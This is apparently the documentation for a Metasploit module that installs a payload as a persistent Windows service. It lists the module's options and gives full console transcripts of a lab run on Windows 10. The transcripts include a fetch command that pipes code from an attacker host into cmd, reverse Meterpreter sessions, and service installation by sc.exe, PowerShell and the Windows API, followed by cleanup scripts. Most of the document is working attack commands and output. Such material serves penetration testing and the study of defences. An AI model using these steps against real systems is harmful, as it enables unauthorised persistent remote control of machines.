## Description This Module will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required. ## Options ### PAYLOAD_NAME Name of payload file to write. Random string as default. ### SERVICE_NAME The name of service. Random string as default. ### SERVICE_DESCRIPTION The description of service. Random string as default. ### SERVICE_DISPLAY_NAME The display name of service. Random string as default. ### METHOD Which method to use to create and start the service. Options are `Auto` (try all until one is successful), `API`, `Powershell`, `sc.exe` ## Verification Steps 1. get session on target with admin/system privs 2. `use exploit/windows/persistence/service` 3. `set payload ` 4. `set lport ` 5. `set lhost ` 6. `exploit` ## Scenarios ### Windows 10 1909 (10.0 Build 18363) Initial shell ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL fetch_command => CURL resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true fetch_pipe => true resource (/root/.msf4/msfconsole.rc)> set lport 4450 lport => 4450 resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 FETCH_URIPATH => w3 resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB FETCH_FILENAME => mkaKJBzbDB resource (/root/.msf4/msfconsole.rc)> to_handler [*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe [*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd [*] Payload Handler Started as Job 0 [*] Starting persistent handler(s)... [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /KAdxHNQrWO8cy5I90gLkHg [*] Adding resource /w3 [*] Started reverse TCP handler on 1.1.1.1:4450 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg [*] Sending payload to 2.2.2.2 (curl/7.79.1) [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49801) at 2025-11-05 16:15:06 -0500 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > background [*] Backgrounding session 1... ``` Method: `sc.exe` ``` msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/service [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(windows/persistence/service) > set session 1 session => 1 msf exploit(windows/persistence/service) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(windows/persistence/service) > set method sc.exe method => sc.exe msf exploit(windows/persistence/service) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Likely exploitable [*] Compiling payload [+] Payload written to C:\Users\windows\AppData\Local\Temp\nAhKD.exe [*] Attempting sc.exe method [*] Install service: amOovON (YmGjSOMpyNU) [*] Service install response: [SC] CreateService SUCCESS [*] [SC] ChangeServiceConfig2 SUCCESS [*] Starting service [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Service start response: SERVICE_NAME: YmGjSOMpyNU TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PID : 6664 FLAGS : [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49831) at 2025-11-05 16:30:40 -0500 msf exploit(windows/persistence/service) > jobs -K Stopping all jobs... ``` Method: `Powershell` ``` msf exploit(windows/persistence/service) > set method Powershell method => Powershell msf exploit(windows/persistence/service) > exploit [*] Exploit running as background job 2. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Likely exploitable [*] Compiling payload [+] Payload written to C:\Users\windows\AppData\Local\Temp\ShNuFKol.exe [*] Attempting Powershell method [*] Install service: eIOICL (mpSlHnVCx) [*] Service install response: Status Name DisplayName ------ ---- ----------- Stopped mpSlHnVCx eIOICL [*] Starting service [*] Service start response: [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49833) at 2025-11-05 16:31:22 -0500 msf exploit(windows/persistence/service) > jobs -K Stopping all jobs... ``` Method: `API` ``` msf exploit(windows/persistence/service) > set method API method => API msf exploit(windows/persistence/service) > exploit [*] Exploit running as background job 3. [*] Exploit completed, but no session was created. msf exploit(windows/persistence/service) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Likely exploitable [*] Compiling payload [+] Payload written to C:\Users\windows\AppData\Local\Temp\ETuJrSPU.exe [*] Attempting API method [*] Install service: vElWSh (krKyTZyQvSWg) [*] Service install code: 0 [*] Starting service [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Service start code: 0 [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc [*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49834) at 2025-11-05 16:31:41 -0500 ``` Method: `Auto` ``` msf exploit(windows/persistence/service) > set method Auto method => Auto msf exploit(windows/persistence/service) > exploit [*] Exploit running as background job 4. [*] Exploit completed, but no session was created. msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Likely exploitable [*] Compiling payload [+] Payload written to C:\Users\windows\AppData\Local\Temp\xuGMR.exe [*] Attempting API method [*] Install service: cbuEWFVI (NzbjSkwfZrk) [*] Service install code: 0 [*] Starting service [*] Sending stage (188998 bytes) to 2.2.2.2 [*] Service start code: 0 [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc [*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:49835) at 2025-11-05 16:32:06 -0500 ``` Cleanup ``` msf exploit(windows/persistence/service) > sessions -i 1 [*] Starting interaction with 1... meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc [*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc for ERB directives. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\nAhKD.exe" resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "stop YmGjSOMpyNU" Process 2812 created. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "delete YmGjSOMpyNU" Process 4140 created. meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc [*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc for ERB directives. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ShNuFKol.exe" resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "stop mpSlHnVCx" Process 680 created. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "delete mpSlHnVCx" Process 8940 created. meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc [*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc for ERB directives. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ETuJrSPU.exe" resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "stop krKyTZyQvSWg" Process 3660 created. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "delete krKyTZyQvSWg" Process 1728 created. meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc [*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc for ERB directives. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\xuGMR.exe" resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "stop NzbjSkwfZrk" Process 3448 created. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "delete NzbjSkwfZrk" Process 9020 created. meterpreter > exit [*] Shutting down session: 1 ```